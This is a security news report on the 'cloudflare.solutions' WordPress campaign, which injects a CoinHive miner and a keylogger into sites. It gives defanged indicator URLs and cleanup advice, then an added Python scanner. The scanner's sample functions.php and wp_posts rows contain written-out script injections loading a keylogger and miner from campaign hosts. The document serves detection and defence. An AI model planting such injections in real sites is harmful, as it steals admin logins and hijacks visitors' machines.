At least 2,000 WordPress websites have been compromised by malware that acts as both a cryptocurrency miner and a keystroke logger. The malware abuses the Cloudflare name and was first discovered several months ago by Sucuri researchers.
The “cloudflare.solutions” Malware Once Again Detected in Campaigns
A few months ago, the Sucuri team came across two injections from the so-called “cloudflare.solutions” malware: a CoinHive cryptominer concealed within fake Google Analytics and jQuery scripts, and the WordPress keylogger from Cloudflare[.]solutions. The malware was first identified in April 2017. According to the research, an evolved version of it has now spread to new domains.
This is what has happened so far:
A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.
According to the researchers, the hackers behind these malware campaigns are the same ones that successfully compromised nearly 5,500 WordPress websites. Both campaigns employ the same malware described at the beginning, the so-called “cloudflare.solutions” malware. However, a keylogger has recently been added to its functionality, putting admin credentials at risk: the malware captures what is typed into both the admin login page and the website’s public-facing front-end.
Researchers identified several injected scripts used in the attacks over the past month:
hxxps://cdjs[.]online/lib.js
hxxps://cdjs[.]online/lib.js?ver=…
hxxps://cdns[.]ws/lib/googleanalytics.js?ver=…
hxxps://msdns[.]online/lib/mnngldr.js?ver=…
hxxps://msdns[.]online/lib/klldr.js
The cdjs[.]online script is injected either into the WordPress database (wp_posts table) or into the theme’s functions.php file, just as in the previous cloudflare[.]solutions attack, the report says.
Similarly to the previous campaign, a fake googleanalytics.js loading an obfuscated script was also discovered.
As for the mining component of the “cloudflare.solutions” malware, the researchers found that the jquery-3.2.1.min.js library is similar to the encrypted CoinHive cryptomining library from the previous version, which was loaded from hxxp://3117488091/lib/jquery-3.2.1.min.js?v=3.2.11.
How to Clean an Infected Website
Even though these new attacks are not as extensive as the initial Cloudflare[.]solutions campaign, the fact that the malware is once again infecting WordPress sites means that there are still admins who have failed to properly protect their websites. Researchers even believe that some of the re-infected websites never noticed the original infection.
Finally, if you find that your website has been compromised by the Cloudflare[.]solutions malware, this is what you need to do: remove the malicious code from your theme’s functions.php, scan the wp_posts table for injections, change all WordPress passwords and, lastly, update all server software, including third-party themes and plugins.
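As an added example (not Sucuri’s code and not part of the original article), here is a Python scanner for the two places the cleanup steps name, the theme’s functions.php and the wp_posts table, that flags script references to the campaign hosts listed above and expands decimal-encoded IP hosts such as the 3117488091 one into dotted form. The sample theme file and post rows are constructed for the demonstration.

```python
import re
import ipaddress

# Hosts the article names as serving the cloudflare.solutions campaign's scripts.
INDICATOR_HOSTS = {"cloudflare.solutions", "cdjs.online", "cdns.ws", "msdns.online"}
# Absolute (http/https, also defanged hxxp) or protocol-relative script references.
URL_RE = re.compile(r"(?:h[tx]{2}ps?:)?//([A-Za-z0-9.\-\[\]]+)(/[^\s'\"<>]*)?")

def normalize_host(host):
    """Undo [.] defanging and expand a decimal IPv4 host (e.g. 3117488091) to dotted form."""
    host = host.replace("[.]", ".").lower()
    if host.isdigit() and int(host) < 2**32:
        return str(ipaddress.IPv4Address(int(host)))
    return host

def scan_text(text, source):
    """Return (source, line_no, host, reason) for each suspicious reference in text."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        for m in URL_RE.finditer(line):
            raw_host = m.group(1)
            host = normalize_host(raw_host)
            if host in INDICATOR_HOSTS:
                findings.append((source, line_no, host, "known campaign host"))
            elif raw_host.isdigit():  # numeric host hides the IP, as in the jQuery loader above
                findings.append((source, line_no, host, "decimal-encoded IP host"))
    return findings

def scan_site(theme_files, posts):
    """theme_files: {path: content}; posts: iterable of (ID, post_content) rows from wp_posts."""
    findings = []
    for path, content in theme_files.items():
        findings.extend(scan_text(content, path))
    for post_id, content in posts:
        findings.extend(scan_text(content, f"wp_posts:{post_id}"))
    return findings

# Constructed sample data standing in for a theme's functions.php and a wp_posts dump.
SAMPLE_THEME = {"wp-content/themes/demo/functions.php": (
    "<?php\n"
    "add_action('wp_head', function () {\n"
    "  echo '<script src=\"https://cdjs.online/lib.js?ver=1.0\"></script>';\n"
    "  echo '<script src=\"http://3117488091/lib/jquery-3.2.1.min.js?v=3.2.11\"></script>';\n"
    "});\n")}
SAMPLE_POSTS = [
    (17, "<p>Hello</p><script src='https://msdns.online/lib/klldr.js'></script>"),
    (18, "<script src='https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js'></script>"),
]
```

Calling scan_site(SAMPLE_THEME, SAMPLE_POSTS) reports the two injected lines in functions.php and the injected post, while the legitimate jQuery reference in post 18 is left alone.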